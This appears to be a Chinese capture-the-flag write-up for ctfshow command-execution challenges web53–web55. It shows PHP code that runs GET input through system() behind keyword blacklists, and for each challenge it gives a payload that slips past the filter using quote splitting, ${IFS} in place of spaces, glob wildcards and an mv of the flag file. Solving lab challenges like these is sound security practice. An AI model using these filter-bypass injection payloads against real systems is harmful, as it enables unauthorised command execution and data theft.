web入门 命令执行 web53-web55
文章目录
- web53
- web54
- web55
web53
<?phpif(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){echo($c);$d = system($c);echo "<br>".$d;}else{echo 'no';}
}else{highlight_file(__FILE__);
}
这个过滤相对之前的来说,没有多过滤什么
不同之处在于,多了一个system() 并且对结果进行了回显
system会回显成功的最后一行输出结果
构造?c=ca''t${IFS}fla?.php
两个单引号’'绕过cat过滤,${IFS}绕过空格过滤,fla?绕过flag过滤
web54
<?phpif(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\>|\</i", $c)){system($c);}
}else{highlight_file(__FILE__);
}
这个题过滤了很多东西,但是没有过滤mv命令。
先看一下目录下的文件?c=ls
然后利用mv命令
?c=mv${IFS}fla?.php${IFS}a.txt
然后访问/a.txt
web55
可以参考这个大佬的博客:https://blog.csdn.net/xiaolong22333/article/details/109480420
<?php// 你们在炫技吗?
if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){system($c);}
}else{highlight_file(__FILE__);
}这个题把字母都过滤了
可以用bin下的base64命令(为啥用base64?因为它含有数字64可以用???64来匹配,其他命令无法匹配到)
?c=/???/????64 ????????
得到的东西base64解码即可得到flag
web入门 命令执行 web53-web55相关推荐
- CTF Web入门 命令执行 笔记
CTF Web入门 命令执行 eval(读取命令),但各种字符被ban if(!pregmatch("...",$c)) #指过滤了...eval($c); 这时候可以尝试 ?c= ...
- ctfshow web入门 命令执行 web29~web77 web118~web124
目录 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 web43 web44 w ...
- CTFSHOW web入门 命令执行+文件包含+PHP特性
刷题时间记录表 ID 开始时间 结束时间 刷题范围 1 2021.08.23 19:20 2021.08.23 21.30 web41-45 2 2021.08.24 22:16 2021.08.25 ...
- ctfhsow web入门 命令执行大全
目录 web-29 web-30 web-31 web-32 web33-36 web-37 web-38 web-39 web-40 web-41 web-42 web-43 web-44 web4 ...
- ctfshow web入门 命令执行:55-57
刷题记录. 目录 web55 web56 web57 web55 关键源码: // 你们在炫技吗? if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match ...
- web入门 命令执行 web29-web41
文章目录 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 参考文章:命令执行绕过小技巧.命令 ...
- web入门 命令执行 web42-web52
文章目录 web42 web43 web44 web45 web46 web47 web48 web49 web50 web51 web52 从42题之后,就跟前面的类型不一样了,之前是eval( c ...
- struts2漏洞_十大常见web漏洞——命令执行漏洞
命令执行漏洞在不同框架下都有存在,也是十分普遍且危害极大,下面我们介绍一个最具代表性的,也是影响范围最大的一个命令执行漏洞--Struts2远程代码执行漏洞. Struts2 漏洞介绍 ApacheS ...
- CTFshow入门命令执行29
打开环境分析题目: <?php error_reporting(0); if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/f ...
最新文章
- 数学之美——统计语言模型
- 最优化算法python实现篇(4)——无约束多维极值(梯度下降法)
- java 标记_java的标记算法
- spark 性能优化
- 没想到,区块链竟然是这样的!
- android使用地图编程,基于Android实现百度地图定位过程详解
- 0308·付费专栏销售排行榜
- 博图os更新_博途V14的新功能(通过U盘给第二代的精智及精简屏传输组态)
- 计算机键盘中英文,苹果电脑键盘上的【⌘】键用英文怎么表达?和露营地又有什么关系...
- mysql创建唯一非聚集索引_创建聚集索引、非聚集索引、唯一索引、唯一键约束...
- oracle中date错误,ORA-01830: date format picture ends before converting entire input string
- 计算机信息工程专业工资,2020年工科类专业薪资最新排名,计算机很吃香,工资水平最高...
- 广州特耐苏-广州风淋通道构造及特点
- php 算生存曲线,生存曲线比较:KM法及Log Rank检验(实例+SPSS)
- Gin Web 网络框架
- 《视搭》开源视频创作工具,保姆级搭建教程,短视频创作利器
- excel矩阵小tips
- HDU 2121 Ice_cream’s world II(最小树形图+虚根)
- VB6 Treeview的添加节点子节点、Treeview打开、Treeview关闭
- 光明勇士服务器一直维护中,光明勇士一人双职业利弊分析 到底好还是不好